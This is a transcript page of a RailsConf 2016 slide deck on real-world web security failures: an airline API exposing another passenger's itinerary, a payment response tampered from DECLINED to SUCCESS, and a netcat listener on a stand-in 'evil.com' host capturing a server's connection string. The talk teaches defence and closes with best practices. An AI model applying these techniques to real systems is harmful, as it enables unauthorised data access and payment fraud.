Upgrade to Pro — share decks privately, control downloads, hide ads and more …

"...But Doesn't Rails Take Care of Security for Me?"

"...But Doesn't Rails Take Care of Security for Me?"

Rails comes with protection against SQL injection, cross site scripting, and cross site request forgery. It provides strong parameters and encrypted session cookies out of the box. What else is there to worry about? Unfortunately, security does not stop at the well-known vulnerabilities and even the most secure web framework cannot save you from everything. Let's take a deep dive into real world examples of security gone wrong!

Justin Collins

May 06, 2016
Tweet

More Decks by Justin Collins

Other Decks in Technology

Transcript

  1. @presidentbeef “...But Doesn’t Rails Take Care of Security for Me?”

    “...But Doesn’t Rails Take Care of Security for Me?” Justin Collins @presidentbeef RailsConf 2016 Justin Collins @presidentbeef RailsConf 2016
  2. @presidentbeef Ugh about me 6 years of application security (AT&T

    Interactive, Twitter, SurveyMonkey) 6 years working on Brakeman OSS (Static analysis security tool for Rails) 2 years working on (More pro static analysis security tool for Rails)
  3. @presidentbeef POST https://smartphone.continental. com/UnitedMobileDataServices/api/wallet/AccessWalletItemsv2 { "accessCode": "'", "application": { "version":

    { "build": "", "displayText": "2.0.20", "major": "", "minor": "" }, "name": "Android", "isProduction": true, "id": 2 }, "deviceID": "37556b06-66bf-40a3-9368-f13b0faa437d", "languageCode": "en-US", "mpNumber": "***REMOVED***", "pushToken": "***REMOVED***", "transactionId": "***REMOVED***", "backgroundRefresh": true }
  4. @presidentbeef { "walletPNRResponse": { "pnrs": [ { "mpNumber": "***REMOVED***", "recordLocator":

    "***REMOVED***", "flightDate": "12/05/2015 06:35 PM", "origin": "PHL", "originCity": "Philadelphia", "destination": "MCO", "destinationCity": "Orlando", "checkInStatus": "0", "firstName": "RANDOLPHA", "lastName": "WESTERGRENJR", "segments": [ { "recordLocator": "***REMOVED***", "carrierCode": "UA", "flightNumber": "3336", "origin": "PHL", "destination": "IAD", "scheduledDepartureDateTime": "12/5/2015 6:35 PM", "scheduledArrivalDateTime": "12/5/2015 7:41 PM", "scheduledDepartureDateTimeGMT": "12/05/2015 11:35 PM", "scheduledArrivalDateTimeGMT": "12/06/2015 12:41 AM", "seats": "", "activationDateTimeGMT": "", "flightStatusSegment": null, "flightStatus": null, "destinationWeather": null, "lastUpdated": "05/27/2015 07:31 AM", "enableUberLinkButton": false, "cabin": "Coach", "cabinType": "United Economy" }, #...
  5. @presidentbeef { "walletPNRResponse": { "pnrs": [ { "mpNumber": "***REMOVED***", "recordLocator":

    "***REMOVED***", "flightDate": "12/05/2015 06:35 PM", "origin": "PHL", "originCity": "Philadelphia", "destination": "MCO", "destinationCity": "Orlando", "checkInStatus": "0", "firstName": "RANDOLPHA", "lastName": "WESTERGRENJR", #...
  6. @presidentbeef Payment Failure Response <Response> <CardTxn> <authcode>NOT AUTHORISED</authcode> <card_scheme>VISA</card_scheme> </CardTxn>

    <datacash_reference>3340105259009953</datacash_reference> <merchantreference>3340105259009953</merchantreference> <mode>LIVE</mode> <reason>DECLINED</reason> <status>7</status> <time>1449024000</time> </Response>
  7. @presidentbeef Payment Failure Response <Response> <CardTxn> <authcode>NOT AUTHORISED</authcode> <card_scheme>VISA</card_scheme> </CardTxn>

    <datacash_reference>3340105259009953</datacash_reference> <merchantreference>3340105259009953</merchantreference> <mode>LIVE</mode> <reason>SUCCESS</reason> <status>1</status> <time>1449024000</time> </Response>
  8. @presidentbeef Capture Connection Strings evil.com:$ nc -v -l 11111 Listening

    on [0.0.0.0] (family 0, port 11111) Connection from [54.166.236.232] port 11111 [tcp/*] accepted CLIENT libcurl 7.40.0 QUIT
  9. @presidentbeef Six passwords were "changeme" Three were same as the

    user's name Two were "password" One was "instagram"
  10. @presidentbeef In Summary Verify current user can access data/perform action

    Never trust the client - think about trust relationships Always use strong hashing algorithms Rate limit important actions Avoid storing secrets in source code Always use strong passwords
  11. @presidentbeef More Resources OWASP Top 10 Web Vulnerabilities www.owasp.org/index.php/Top_10_2013-Top_10 OWASP

    Top 10 Proactive Security Controls www.owasp.org/index.php/OWASP_Proactive_Controls RailsGoat https://github.com/OWASP/railsgoat nVisium SecCasts https://nvisium.com/seccasts/
  12. @presidentbeef Things I’ll Forget to Mention I have stickers Security

    BoF after Jess’ talk I am happy to speak at companies in the SF area @presidentbeef | @brakeman | @brakemanpro